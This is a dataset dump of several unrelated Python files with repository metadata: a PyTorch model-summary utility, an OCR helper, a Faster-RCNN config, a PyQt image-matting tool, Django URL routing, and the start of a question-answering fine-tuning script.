5c4eaadc947b65e4a311d1a59df67482db0242b6 | 5,564 | py | Python | ganslate/utils/summary.py | ibro45/a | a90d92eaf041331cd3397f788cb60884cb0e176b | [
"BSD-3-Clause"
] | 17 | 2021-09-07T15:23:04.000Z | 2022-01-28T15:46:54.000Z | ganslate/utils/summary.py | ibro45/a | a90d92eaf041331cd3397f788cb60884cb0e176b | [
"BSD-3-Clause"
] | 18 | 2021-09-08T12:31:39.000Z | 2021-12-13T15:26:01.000Z | ganslate/utils/summary.py | ibro45/a | a90d92eaf041331cd3397f788cb60884cb0e176b | [
"BSD-3-Clause"
] | 2 | 2021-11-10T11:23:00.000Z | 2022-02-10T07:57:20.000Z | # Taken from https://github.com/sksq96/pytorch-summary/blob/master/torchsummary/torchsummary.py
# Edited:
# - returns string and doesn't print anything anymore, so that it can be used with `logging` module
# - summary_string() -> summary(), removed old summary()
# - gan_summary function that outputs summaries of each unique network architecture in GAN setup
import torch
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from collections import OrderedDict
import numpy as np
def gan_summary(gan, dataloader):
    """Summarize each unique network architecture in a GAN setup.

    Networks sharing the same class (e.g. G_AB and G_BA) are printed once.
    """
    sample_shape = tuple(dataloader.dataset[0]["A"].shape)
    message = "\n------------------------------------------------------------------------------\n"
    message += f"Input shape of an example from the dataset: {sample_shape}\n"
    message += f"GAN setup consists of networks: {list(gan.networks.keys())}\n"

    seen_types = set()
    for name, net in gan.networks.items():
        if isinstance(net, DistributedDataParallel):
            net = net.module
        type_key = str(type(net))
        # Emit each unique architecture only once.
        if type_key not in seen_types:
            message += f"\nNetwork name: {name}\n"
            message += summary(net, sample_shape, device=gan.device)
            seen_types.add(type_key)
    return message
def summary(model, input_size, batch_size=-1, device=torch.device('cuda:0'), dtypes=None):
    """Build a Keras-style, layer-by-layer summary string for ``model``.

    Args:
        model: the ``torch.nn.Module`` to inspect.
        input_size: shape of one input (without batch dim), or a list of such
            shapes for multi-input models.
        batch_size: batch size shown in the table (-1 means "any").
        device: device on which the probe tensors are created.
        dtypes: per-input tensor types; defaults to ``torch.FloatTensor``.

    Returns:
        str: the formatted summary table with parameter and memory totals.
    """
    if dtypes is None:  # was `dtypes == None`; identity check is the correct idiom
        dtypes = [torch.FloatTensor] * len(input_size)

    summary_str = ''

    def register_hook(module):
        # Record input/output shapes and parameter counts on each forward call.
        def hook(module, input, output):
            class_name = str(module.__class__).split(".")[-1].split("'")[0]
            module_idx = len(summary)

            m_key = "%s-%i" % (class_name, module_idx + 1)
            summary[m_key] = OrderedDict()
            summary[m_key]["input_shape"] = list(input[0].size())
            summary[m_key]["input_shape"][0] = batch_size
            if isinstance(output, (list, tuple)):
                summary[m_key]["output_shape"] = [[-1] + list(o.size())[1:] for o in output]
            else:
                summary[m_key]["output_shape"] = list(output.size())
                summary[m_key]["output_shape"][0] = batch_size

            params = 0
            if hasattr(module, "weight") and hasattr(module.weight, "size"):
                params += torch.prod(torch.LongTensor(list(module.weight.size())))
                summary[m_key]["trainable"] = module.weight.requires_grad
            if hasattr(module, "bias") and hasattr(module.bias, "size"):
                params += torch.prod(torch.LongTensor(list(module.bias.size())))
            summary[m_key]["nb_params"] = params

        # Containers delegate to their children, so don't hook them directly.
        if not isinstance(module, (nn.Sequential, nn.ModuleList)):
            hooks.append(module.register_forward_hook(hook))

    # multiple inputs to the network
    if isinstance(input_size, tuple):
        input_size = [input_size]

    # batch_size of 2 so batchnorm layers can compute statistics
    x = [
        torch.rand(2, *in_size).type(dtype).to(device=device)
        for in_size, dtype in zip(input_size, dtypes)
    ]

    # create properties
    summary = OrderedDict()
    hooks = []

    # register hook on every submodule, run one forward pass, then clean up
    model.apply(register_hook)
    model(*x)
    for h in hooks:
        h.remove()

    summary_str += "----------------------------------------------------------------" + "\n"
    line_new = "{:>20} {:>25} {:>15}".format("Layer (type)", "Output Shape", "Param #")
    summary_str += line_new + "\n"
    summary_str += "================================================================" + "\n"
    total_params = 0
    total_output = 0
    trainable_params = 0
    for layer in summary:
        # input_shape, output_shape, trainable, nb_params
        line_new = "{:>20} {:>25} {:>15}".format(
            layer,
            str(summary[layer]["output_shape"]),
            "{0:,}".format(summary[layer]["nb_params"]),
        )
        total_params += summary[layer]["nb_params"]

        total_output += np.prod(summary[layer]["output_shape"])
        if "trainable" in summary[layer] and summary[layer]["trainable"]:
            trainable_params += summary[layer]["nb_params"]
        summary_str += line_new + "\n"

    # assume 4 bytes/number (float on cuda).
    total_input_size = abs(np.prod(sum(input_size, ())) * batch_size * 4. / (1024**2.))
    total_output_size = abs(2. * total_output * 4. / (1024**2.))  # x2 for gradients
    total_params_size = abs(total_params * 4. / (1024**2.))
    total_size = total_params_size + total_output_size + total_input_size

    summary_str += "================================================================" + "\n"
    summary_str += "Total params: {0:,}".format(total_params) + "\n"
    summary_str += "Trainable params: {0:,}".format(trainable_params) + "\n"
    summary_str += "Non-trainable params: {0:,}".format(total_params - trainable_params) + "\n"
    summary_str += "----------------------------------------------------------------" + "\n"
    summary_str += "Input size (MB): %0.2f" % total_input_size + "\n"
    summary_str += "Forward/backward pass size (MB): %0.2f" % total_output_size + "\n"
    summary_str += "Params size (MB): %0.2f" % total_params_size + "\n"
    summary_str += "Estimated Total Size (MB): %0.2f" % total_size + "\n"
    summary_str += "----------------------------------------------------------------" + "\n"
    return summary_str
| 42.473282 | 103 | 0.571891 |
d15cfb55908ce1b4e97403d6d1c56f3db60a2da3 | 194 | py | Python | trufimonitor/dbtemplate/stock.py | trufi-association/trufi-monitor-backend | 8974a061debe3582605a6e6ec63e4116fe7ef60b | [
"MIT"
] | null | null | null | trufimonitor/dbtemplate/stock.py | trufi-association/trufi-monitor-backend | 8974a061debe3582605a6e6ec63e4116fe7ef60b | [
"MIT"
] | null | null | null | trufimonitor/dbtemplate/stock.py | trufi-association/trufi-monitor-backend | 8974a061debe3582605a6e6ec63e4116fe7ef60b | [
"MIT"
] | null | null | null | from ..DatabaseTemplate import strategy
table = {
"label": ["varchar(50)", ""],
"amount": ["int", 0],
"value": ["int", 0],
"state": ["varchar(50)", ""]
}
strategy = Strategy.REPLACEORADD
| 17.636364 | 39 | 0.587629 |
2e283064706e79125f729291246f978923eb27a2 | 598 | py | Python | vst/chinese_ocr.py | ShikamaAppliances501c3/video-subtitle-translator | fc5cf0fb9d6c9a65fd819dbcccd7c9a8a5d9ca0d | [
"MIT"
] | null | null | null | vst/chinese_ocr.py | ShikamaAppliances501c3/video-subtitle-translator | fc5cf0fb9d6c9a65fd819dbcccd7c9a8a5d9ca0d | [
"MIT"
] | null | null | null | vst/chinese_ocr.py | ShikamaAppliances501c3/video-subtitle-translator | fc5cf0fb9d6c9a65fd819dbcccd7c9a8a5d9ca0d | [
"MIT"
] | null | null | null | try:
from PIL import Image
except ImportError:
import Image
import pytesseract
import cv2
import numpy as np
class ChineseOCR:

    @staticmethod
    def ocr(path) -> str:
        """Run simplified-Chinese OCR on the image file at *path*."""
        frame = cv2.imread(path)
        frame = ChineseOCR.netflix_manipulations(frame)
        return pytesseract.image_to_string(frame, lang='chi_sim')

    @staticmethod
    def netflix_manipulations(image):
        """Thicken glyph strokes (dilate) and invert colors before OCR."""
        kernel = np.ones((2, 2), np.uint8)
        dilated = cv2.dilate(image, kernel, iterations=1)
        return cv2.bitwise_not(dilated)
5f65ba4ac5bc35961d2c0bf238f9a2b1de75e9ad | 1,163 | py | Python | tests/CH4/get_rdf.py | pyflosic/pyeff | 4b76fcc4a0bfb25f9f4106567d01b5ea02db6737 | [
"Apache-2.0"
] | 3 | 2019-06-24T08:04:25.000Z | 2020-05-26T03:45:45.000Z | tests/CH4/get_rdf.py | pyflosic/pyeff | 4b76fcc4a0bfb25f9f4106567d01b5ea02db6737 | [
"Apache-2.0"
] | null | null | null | tests/CH4/get_rdf.py | pyflosic/pyeff | 4b76fcc4a0bfb25f9f4106567d01b5ea02db6737 | [
"Apache-2.0"
] | null | null | null | from ase.io import read
from ase.ga.utilities import get_rdf,get_nnmat
from matplotlib.pyplot import *
from ase.atoms import Atoms
import numpy as np
import glob
l = 5.0
nmax = 100
atoms = read(glob.glob('final.xyz')[0])
atoms.set_cell(np.eye(3)*l)
print atoms
up = Atoms()
up.set_cell(atoms.get_cell())
up_target = 'X'
dn = Atoms()
dn.set_cell(atoms.get_cell())
dn_target = 'He'
nuclei = Atoms()
nuclei.set_cell(atoms.get_cell())
for a in range(len(atoms)):
if atoms[a].symbol == up_target:
up.append(atoms[a])
if atoms[a].symbol == dn_target:
dn.append(atoms[a])
if atoms[a].symbol != up_target and atoms[a].symbol != dn_target:
nuclei.append(atoms[a])
data_up = get_rdf(up,l,nmax)
data_dn = get_rdf(dn,l,nmax)
data_nuclei = get_rdf(nuclei,l,nmax)
data_all = get_rdf(atoms,l,nmax)
# data_up[0]/max(data_up[0])*len(up)
# data_dn[0]/max(data_dn[0])*len(dn)
bar(data_up[1],data_up[0],label='up',width=0.02)
bar(data_dn[1],data_dn[0],label='dn',width=0.01)
bar(data_nuclei[1],data_nuclei[0],label='nuclei',width=0.02)
#bar(data_all[1],data_all[0],label='all',width=0.05)
legend()
show()
| 26.431818 | 73 | 0.671539 |
bb19aaa2119f881cde19b98a5630bcdd678d7b87 | 3,737 | py | Python | libs/configs/cfgs_DOTA_v3.py | khanfarhan10/R2CNN_Faster-RCNN_Tensorflow | 0bcc4209defefebd7b3644c6f4a0dcaaa6170c3f | [
"MIT"
] | 629 | 2018-05-29T06:33:47.000Z | 2022-03-28T09:43:35.000Z | libs/configs/cfgs_DOTA_v3.py | khanfarhan10/R2CNN_Faster-RCNN_Tensorflow | 0bcc4209defefebd7b3644c6f4a0dcaaa6170c3f | [
"MIT"
] | 118 | 2018-06-08T02:28:50.000Z | 2021-08-23T07:42:01.000Z | libs/configs/cfgs_DOTA_v3.py | khanfarhan10/R2CNN_Faster-RCNN_Tensorflow | 0bcc4209defefebd7b3644c6f4a0dcaaa6170c3f | [
"MIT"
] | 211 | 2018-05-31T02:44:34.000Z | 2022-03-03T10:48:01.000Z | # -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import os
import tensorflow as tf
# ------------------------------------------------
VERSION = 'FasterRCNN_20180515_DOTA_v3'
NET_NAME = 'resnet_v1_101'
ADD_BOX_IN_TENSORBOARD = True
# ---------------------------------------- System_config
ROOT_PATH = os.path.abspath('../')
print(20*"++--")
print(ROOT_PATH)
GPU_GROUP = "2"
SHOW_TRAIN_INFO_INTE = 10
SMRY_ITER = 100
SAVE_WEIGHTS_INTE = 2000
SUMMARY_PATH = ROOT_PATH + '/output/summary'
TEST_SAVE_PATH = ROOT_PATH + '/tools/test_result'
INFERENCE_IMAGE_PATH = ROOT_PATH + '/tools/inference_image'
INFERENCE_SAVE_PATH = ROOT_PATH + '/tools/inference_results'
if NET_NAME.startswith('resnet'):
weights_name = NET_NAME
elif NET_NAME.startswith('MobilenetV2'):
weights_name = 'mobilenet/mobilenet_v2_1.0_224'
else:
raise NotImplementedError
PRETRAINED_CKPT = ROOT_PATH + '/data/pretrained_weights/' + weights_name + '.ckpt'
TRAINED_CKPT = os.path.join(ROOT_PATH, 'output/trained_weights')
EVALUATE_H_DIR = ROOT_PATH + '/output' + '/evaluate_h_result_pickle/' + VERSION
EVALUATE_R_DIR = ROOT_PATH + '/output' + '/evaluate_r_result_pickle/' + VERSION
TEST_ANNOTATION_PATH = '/mnt/USBB/gx/DOTA/DOTA_clip/val/labeltxt'
# ------------------------------------------ Train config
RESTORE_FROM_RPN = False
IS_FILTER_OUTSIDE_BOXES = True
ROTATE_NMS_USE_GPU = True
FIXED_BLOCKS = 2 # allow 0~3
RPN_LOCATION_LOSS_WEIGHT = 1 / 7
RPN_CLASSIFICATION_LOSS_WEIGHT = 2.0
FAST_RCNN_LOCATION_LOSS_WEIGHT = 4.0
FAST_RCNN_CLASSIFICATION_LOSS_WEIGHT = 2.0
RPN_SIGMA = 3.0
FASTRCNN_SIGMA = 1.0
MUTILPY_BIAS_GRADIENT = None # 2.0 # if None, will not multipy
GRADIENT_CLIPPING_BY_NORM = None # 10.0 if None, will not clip
EPSILON = 1e-5
MOMENTUM = 0.9
LR = 0.0003 # 0.0003
DECAY_STEP = [60000, 120000] # 90000, 120000
MAX_ITERATION = 1000000
# -------------------------------------------- Data_preprocess_config
DATASET_NAME = 'DOTA' # 'ship', 'spacenet', 'pascal', 'coco'
PIXEL_MEAN = [123.68, 116.779, 103.939] # R, G, B. In tf, channel is RGB. In openCV, channel is BGR
IMG_SHORT_SIDE_LEN = 800
IMG_MAX_LENGTH = 1000
CLASS_NUM = 15
# --------------------------------------------- Network_config
BATCH_SIZE = 1
INITIALIZER = tf.random_normal_initializer(mean=0.0, stddev=0.01)
BBOX_INITIALIZER = tf.random_normal_initializer(mean=0.0, stddev=0.001)
WEIGHT_DECAY = 0.0001
# ---------------------------------------------Anchor config
BASE_ANCHOR_SIZE_LIST = [256] # can be modified
ANCHOR_STRIDE = [16] # can not be modified in most situations
ANCHOR_SCALES = [0.0625, 0.125, 0.25, 0.5, 1., 2.0] # [4, 8, 16, 32]
ANCHOR_RATIOS = [1, 1 / 2, 2., 1 / 3., 3., 5., 1 / 4., 4., 1 / 5., 6., 1 / 6., 7., 1 / 7.]
ROI_SCALE_FACTORS = [10., 10., 5.0, 5.0, 5.0]
ANCHOR_SCALE_FACTORS = None
# --------------------------------------------RPN config
KERNEL_SIZE = 3
RPN_IOU_POSITIVE_THRESHOLD = 0.7
RPN_IOU_NEGATIVE_THRESHOLD = 0.3
TRAIN_RPN_CLOOBER_POSITIVES = False
RPN_MINIBATCH_SIZE = 256
RPN_POSITIVE_RATE = 0.5
RPN_NMS_IOU_THRESHOLD = 0.7
RPN_TOP_K_NMS_TRAIN = 12000
RPN_MAXIMUM_PROPOSAL_TARIN = 2000
RPN_TOP_K_NMS_TEST = 10000 # 5000
RPN_MAXIMUM_PROPOSAL_TEST = 300 # 300
# -------------------------------------------Fast-RCNN config
ROI_SIZE = 14
ROI_POOL_KERNEL_SIZE = 2
USE_DROPOUT = False
KEEP_PROB = 1.0
SHOW_SCORE_THRSHOLD = 0.5 # only show in tensorboard
FAST_RCNN_NMS_IOU_THRESHOLD = 0.1 # 0.6
FAST_RCNN_NMS_MAX_BOXES_PER_CLASS = 150
FAST_RCNN_IOU_POSITIVE_THRESHOLD = 0.4
FAST_RCNN_IOU_NEGATIVE_THRESHOLD = 0.0 # 0.1 < IOU < 0.5 is negative
FAST_RCNN_MINIBATCH_SIZE = 256 # if is -1, that is train with OHEM
FAST_RCNN_POSITIVE_RATE = 0.35
ADD_GTBOXES_TO_TRAIN = False
| 31.141667 | 100 | 0.678619 |
3132c5f2785de9dc4a67f2d9a1c808c7850ddc43 | 537 | py | Python | learning_strategies/evolution/abstracts.py | jinPrelude/simple-es | 759f3f70e641463a785a7275ba16c9db72fb29bf | [
"Apache-2.0"
] | 10 | 2020-08-16T11:43:23.000Z | 2022-01-21T23:21:52.000Z | learning_strategies/evolution/abstracts.py | jinPrelude/simple-es | 759f3f70e641463a785a7275ba16c9db72fb29bf | [
"Apache-2.0"
] | 2 | 2021-03-25T09:22:21.000Z | 2021-06-24T09:55:28.000Z | learning_strategies/evolution/abstracts.py | jinPrelude/give-life-to-agents | ebf7d89a05a8e820759a0cf80adcc9499c8425d8 | [
"Apache-2.0"
] | 2 | 2021-08-10T14:26:55.000Z | 2021-09-27T20:57:48.000Z | import os
from abc import *
class BaseESLoop(metaclass=ABCMeta):
    """Interface for evolution-strategy training loops."""

    @abstractmethod
    def __init__(self):
        pass

    @abstractmethod
    def run(self):
        # Execute the full ES training loop.
        pass
@abstractmethod
def __init__(selfm):
pass
@abstractmethod
def _gen_offsprings(self):
pass
@abstractmethod
def get_elite_model(self):
pass
@abstractmethod
def init_offspring(self):
pass
@abstractmethod
def evaluate(self):
pass
| 15.342857 | 47 | 0.635009 |
87679e0d442327fe273cfdea93af1b3ef866ba7b | 349 | py | Python | backend/apps/modellog/urls.py | Huoran559/vue-element-frontend-backend | 2ab21792c314692fb9b11c6e5f1e890ffaf5cf3c | [
"MIT"
] | 15 | 2021-01-31T01:45:46.000Z | 2022-03-27T00:23:21.000Z | backend/apps/modellog/urls.py | zouv/vue-admin-django | 40e91e2ff0781dad89a3f5325514a04816406cfb | [
"MIT"
] | 10 | 2020-06-06T00:18:48.000Z | 2022-01-13T01:47:39.000Z | backend/apps/modellog/urls.py | zouv/vue-admin-django | 40e91e2ff0781dad89a3f5325514a04816406cfb | [
"MIT"
] | 4 | 2021-07-09T09:45:44.000Z | 2022-03-28T06:47:31.000Z | # -*- coding: utf-8 -*-
#author:laoseng(QQ:1572665580),feilong(hhr66@qq.com)
#create:2018-09
from rest_framework import routers
from .views import *
router = routers.DefaultRouter()
router.register(r'logsentrys', LogsEntryViewSet, base_name='logsentry')
router.register(r'models', ContentTypeViewSet, base_name='model')
urlpatterns = router.urls
| 26.846154 | 71 | 0.770774 |
5e5abbdcf1d3307a4af5029663fe058a8d3e743a | 10,277 | py | Python | main.py | zhen8838/ai-matting-tool | 8cb08205558ff94c3f78fa115e42b5fe2d02c0a8 | [
"MIT"
] | null | null | null | main.py | zhen8838/ai-matting-tool | 8cb08205558ff94c3f78fa115e42b5fe2d02c0a8 | [
"MIT"
] | null | null | null | main.py | zhen8838/ai-matting-tool | 8cb08205558ff94c3f78fa115e42b5fe2d02c0a8 | [
"MIT"
] | null | null | null | from PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox
from PyQt5.QtGui import QPixmap, QImage
from PyQt5.QtCore import Qt, QCoreApplication, QThread, pyqtSignal, QDir
from waiting import WaitingDialog
from inputcolor import InputColor
import sys
import os
sys.path.insert(0, os.getcwd())
import Ui_draw
from pathlib import Path
from typing import List
from operator import add, sub
import numpy as np
import cv2
import torch
from easydict import EasyDict
import yaml
class ImageFileList(object):
    """Circular cursor over a directory's image paths, starting at the
    currently open file.  ``next``/``past`` wrap around at either end."""

    def __init__(self, current_file: Path, file_list: List[Path]) -> None:
        self.list = file_list
        self.idx = file_list.index(current_file)
        self.size = len(self.list)

    def __len__(self):
        # BUG fix: the original computed ``self.size`` without returning it,
        # so len() raised TypeError ("__len__ returned non-int").
        return self.size

    def indexing(self, op, default_num) -> Path:
        # Move the cursor with *op*; wrap to *default_num* when it leaves
        # the valid range [0, size).
        self.idx = op(self.idx, 1)
        if self.idx < 0 or self.idx >= self.size:
            self.idx = default_num
        f = self.list[self.idx]
        return f

    def next(self) -> Path:
        return self.indexing(add, 0)

    def past(self) -> Path:
        return self.indexing(sub, self.size - 1)

    def curt(self) -> Path:
        # Identity operation: return the current file without moving.
        return self.indexing(lambda a, b: a, self.idx)
def np2qimg(im_np: np.ndarray) -> QImage:
    """Wrap an HxWx3 (RGB) or HxWx4 (RGBA) uint8 array in a QImage."""
    height, width, channels = im_np.shape
    fmt = QImage.Format_RGB888 if channels == 3 else QImage.Format_RGBA8888
    return QImage(im_np.data, width, height, width * channels, fmt)
def qimg2np(im: QImage) -> np.ndarray:
    """View a 32-bit QImage as an (H, W, 4) uint8 array."""
    height, width = im.height(), im.width()
    buf = im.constBits()
    buf.setsize(height * width * 4)  # expose the raw pixel buffer to numpy
    return np.frombuffer(buf, 'uint8').reshape((height, width, 4))
class AiMattingThread(QThread):
    # Runs the matting network off the GUI thread and emits the resulting
    # mask overlay as a QPixmap when done.
    finished = pyqtSignal(QPixmap)

    def setImage(self, im):
        # RGB(A) numpy image to segment; must be set before start().
        self.im = im

    def setModel(self, model):
        # Trained segmentation network; must be set before start().
        self.model = model

    @staticmethod
    def ai_matting_mask(im: np.ndarray, model: torch.nn.Module) -> np.ndarray:
        """ use ai model get image mask

        Args:
            im (np.ndarray): image
            model (torch.nn.Module): network

        Returns:
            np.ndarray: mask (np.bool)
        """
        # Convert to BGR float and subtract per-channel means
        # (presumably the Caffe/VGG BGR means -- confirm against training).
        im = cv2.cvtColor(im.copy(), cv2.COLOR_RGB2BGR).astype('float32')
        im -= np.array((104.00699, 116.66877, 122.67892), 'float32')
        hw = np.array(im.shape[:2], dtype='uint32')
        # resize image to multiple of 32
        new_hw = (hw // 32) * 32
        im = cv2.resize(im, tuple(new_hw[::-1]))
        im = im.transpose((2, 0, 1))
        with torch.no_grad():
            ims = torch.autograd.Variable(torch.Tensor(im[None, ...]))
            preds = model(ims, mode=1)
            sigmod = np.squeeze(torch.sigmoid(preds).cpu().data.numpy())
        # Resize the probability map back to the original resolution.
        if (new_hw != hw).any():
            sigmod = cv2.resize(sigmod, tuple(hw[::-1]))
        # Threshold at 1/255, i.e. anything above ~0.4% probability is mask.
        mask = 255 * sigmod
        return mask > 1

    def run(self) -> None:
        # Compute the mask, tint it semi-transparent green (RGBA 0,128,0,128),
        # and hand the pixmap back to the GUI via the finished signal.
        mask = self.ai_matting_mask(self.im, self.model)
        h, w = self.im.shape[:2]
        mask_im = (mask[..., None] *
                   np.tile(np.reshape(
                       np.array([0, 128, 0, 128], dtype='uint8'),
                       [1, 1, 4]), [h, w, 1]))
        mask_pixmap = QPixmap.fromImage(np2qimg(mask_im))
        self.finished.emit(mask_pixmap)
class MyMainWindow(QMainWindow):
    # Main window that persists the edited configuration back to config.yml
    # when the application is closed.

    def setConfigDict(self, config: EasyDict):
        # Keep a reference to the live configuration so closeEvent can save it.
        self.config = config

    def closeEvent(self, event) -> None:
        # Serialize user settings before the window closes.
        with open('./config.yml', 'w') as f:
            yaml.safe_dump(self.config.__dict__, f)
        super().closeEvent(event)
class Ui_DrawTask(Ui_draw.Ui_MainWindow):
    def setupCustom(self, MainWindow: MyMainWindow):
        """Initialize application state: config, matting model, worker thread,
        and the waiting dialog shown while the model runs."""
        self.MainWindow = MainWindow
        self.input_list: ImageFileList = None
        self.output_dir: Path = None
        self.cur_path: Path = None
        self.export_path: Path = None
        self.cur_np_im: np.ndarray = None
        self.mask_pixmap: QPixmap = None
        # Load persisted user settings from the working directory.
        with open('config.yml') as f:
            self.config = EasyDict(yaml.safe_load(f))
        self.MainWindow.setConfigDict(self.config)
        # Load the matting network on CPU and put it in inference mode.
        self.model = torch.load('./final-all.pth')
        self.model.to(torch.device('cpu'))
        self.model.eval()
        self.aimattingthread = AiMattingThread(None)
        self.aimattingthread.setModel(self.model)
        self.waitdialog = WaitingDialog(self.centralwidget)
        def _finshed(pixmap):
            # TODO: change this implementation approach
            # Called when the worker finishes: hide the wait dialog and show
            # the image with the freshly computed mask overlay.
            self.waitdialog.close()
            self.mask_pixmap = pixmap
            pix = QPixmap.fromImage(np2qimg(self.cur_np_im))
            self.draw_lb.setPixmap(pix, self.mask_pixmap)
            self.draw_lb.setDrawLabelState('enable')
        self.aimattingthread.finished.connect(_finshed)
    def setupSolt(self):
        # Connect every widget's signal to its handler (note: "Solt" is a
        # typo of "Slot" kept for interface compatibility).
        self.set_state_bt()
        self.set_input_bt()
        self.set_output_bt()
        self.set_next_past_bt()
        self.set_pen_size_bt()
        self.set_export_bt()
        self.set_color_mb()
@staticmethod
def read_im(img_path):
im = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
ch = im.shape[-1]
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB if ch == 3 else cv2.COLOR_BGRA2RGBA)
return im
    def set_color_mb(self) -> None:
        """Connect the menu-bar "set color" action to the color-picker dialog
        and persist the chosen export color in the config."""
        def _set_color():
            self.config.export_color = InputColor.getColors(self.centralwidget, self.config.export_color)
            self.MainWindow.setConfigDict(self.config)
        self.actionset_color.triggered.connect(_set_color)
    def set_draw_lb_background(self, img_path):
        # Load the image into the drawing label; when AI matting is enabled
        # (checkbox), dispatch the mask computation to the worker thread and
        # show a waiting dialog, otherwise display the image immediately.
        self.cur_np_im = self.read_im(img_path)
        self.mask_pixmap = None
        if self.check_bx.isChecked():
            self.aimattingthread.setImage(self.cur_np_im)
            self.waitdialog.show()
            self.aimattingthread.start()
        else:
            pix = QPixmap.fromImage(np2qimg(self.cur_np_im))
            self.draw_lb.setPixmap(pix, self.mask_pixmap)
            self.draw_lb.setDrawLabelState('enable')
def set_res_lb_background(self, img_path):
# np_im = self.read_im(img_path)
# self.resut_lb.setPixmap(QPixmap.fromImage(np2qimg(np_im)), None)
self.resut_lb.setPixmap(QPixmap(img_path), None)
    def set_pen_size_bt(self):
        # Forward slider value changes directly to the draw label's pen size.
        self.pen_size_sd.valueChanged['int'].connect(self.draw_lb.setPenSize)
def set_state_bt(self):
self.state_bt.setCheckable(True)
def fc():
if self.state_bt.isChecked():
self.state_bt.setText("修补")
self.draw_lb.setDrawLabelMode('clear')
else:
self.state_bt.setText("消除")
self.draw_lb.setDrawLabelMode('line')
self.state_bt.clicked.connect(fc)
def change_matting_image(self):
self.filename_lb.setText(self.cur_path.name)
self.set_draw_lb_background(self.cur_path.as_posix())
self.export_path = (self.output_dir / (self.cur_path.stem + '.png'))
if self.export_path.exists():
self.set_res_lb_background(self.export_path.as_posix())
else:
self.resut_lb.clearImage()
def set_input_bt(self):
def get_img_path():
if self.output_dir == None:
msgBox = QMessageBox()
msgBox.setWindowTitle("提示")
msgBox.setText("请先设置输出目录")
msgBox.exec()
return
f_path, _ = QFileDialog.getOpenFileName(parent=None, caption="Select Image",
filter="Images (*.jpg *.jpeg *.tif *.bmp *.png)",
options=QFileDialog.ReadOnly)
if f_path != '':
f_path = Path(f_path)
input_dir: Path = f_path.parent
qdir = QDir(input_dir.as_posix())
qdir.setNameFilters("*.jpg *.jpeg *.tif *.bmp *.png".split(' '))
f_list = [input_dir / f.fileName() for f in qdir.entryInfoList()]
self.input_list = ImageFileList(f_path, f_list)
self.cur_path = self.input_list.curt()
self.input_lb.setText(self.cur_path.parent.as_posix())
# 设置进度条
self.file_pb.setRange(0, self.input_list.size)
self.file_pb.setValue(self.input_list.idx)
self.change_matting_image()
else:
self.input_lb.setText("请选择输入文件")
self.input_bt.clicked.connect(get_img_path)
def set_output_bt(self):
def get_out_path():
d_path = QFileDialog.getExistingDirectory(parent=None, caption="Select Directory",
options=QFileDialog.ReadOnly | QFileDialog.ShowDirsOnly)
d_path = Path(d_path)
self.output_dir = d_path
self.output_lb.setText(self.output_dir.as_posix())
self.output_bt.clicked.connect(get_out_path)
def set_next_past_bt(self):
def change_label(mode):
if self.input_list != None and self.output_dir != None:
self.cur_path = (self.input_list.next()
if mode == 'sub' else self.input_list.past())
self.file_pb.setValue(self.input_list.idx) # 进度条设置
self.change_matting_image()
self.next_bt.clicked.connect(lambda: change_label('add'))
self.past_bt.clicked.connect(lambda: change_label('sub'))
def set_export_bt(self):
def export_im():
if self.output_dir != None and self.cur_path != None:
drawed_im = qimg2np(self.draw_lb.exportMaskImage())
# the region need masked value is 1, other is 0
mask = np.expand_dims(drawed_im[..., 1] > 0, -1)
valid_part = self.cur_np_im.copy() * np.logical_not(mask)
rgb = np.reshape(np.array(self.config.export_color[:3], 'uint8'), [1, 1, 3])
alpha = np.reshape(np.array(self.config.export_color[3:4], 'uint8'), [1, 1, 1])
invalid_part = np.tile(rgb,
list(self.cur_np_im.shape[:2]) + [1]) * mask
valid_alpha = np.tile(np.array([[[255]]], 'uint8'),
list(self.cur_np_im.shape[:2]) + [1]) * np.logical_not(mask)
invalid_alpha = np.tile(alpha,
list(self.cur_np_im.shape[:2]) + [1]) * mask
self.cur_np_im_masked = valid_part + invalid_part
alpha_masked = valid_alpha + invalid_alpha
cv2.imwrite(self.export_path.as_posix(),
np.concatenate((cv2.cvtColor(self.cur_np_im_masked, cv2.COLOR_RGB2BGR),
alpha_masked), -1))
self.set_res_lb_background(self.export_path.as_posix())
# print(f'export success:{export_path}')
else:
msgBox = QMessageBox()
msgBox.setWindowTitle("提示")
msgBox.setText("请先设置输入目录与输出目录")
msgBox.exec()
self.export_bt.clicked.connect(export_im)
if __name__ == '__main__':
    # Standard Qt bootstrap: build the main window, install the generated UI,
    # apply the custom widgets/config, connect signals, then enter the event loop.
    app = QApplication(sys.argv)
    MainWindow = MyMainWindow()
    ui = Ui_DrawTask()
    ui.setupUi(MainWindow)
    ui.setupCustom(MainWindow)
    ui.setupSolt()
    MainWindow.show()
    sys.exit(app.exec_())
| 33.045016 | 104 | 0.648146 |
751ede222c60781749575a9ac9a7f01eb036bd34 | 47,299 | py | Python | examples/flax/question-answering/run_qa.py | Ravoxsg/transformers | 3212a1d4a6fbded40daad7153f222c91acabe82d | [
"Apache-2.0"
] | 31 | 2022-02-02T13:13:41.000Z | 2022-03-29T08:37:20.000Z | examples/flax/question-answering/run_qa.py | Ravoxsg/transformers | 3212a1d4a6fbded40daad7153f222c91acabe82d | [
"Apache-2.0"
] | 1 | 2022-02-17T12:40:59.000Z | 2022-02-17T12:40:59.000Z | examples/flax/question-answering/run_qa.py | Ravoxsg/transformers | 3212a1d4a6fbded40daad7153f222c91acabe82d | [
"Apache-2.0"
] | 2 | 2022-02-07T10:53:33.000Z | 2022-02-17T10:03:01.000Z | #!/usr/bin/env python
# coding=utf-8
# Copyright 2021 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for question answering.
"""
# You can also adapt this script on your own question answering task. Pointers for this are left as comments.
import json
import logging
import os
import random
import sys
import time
from dataclasses import asdict, dataclass, field
from enum import Enum
from itertools import chain
from pathlib import Path
from typing import Any, Callable, Dict, Optional, Tuple
import datasets
import numpy as np
from datasets import load_dataset, load_metric
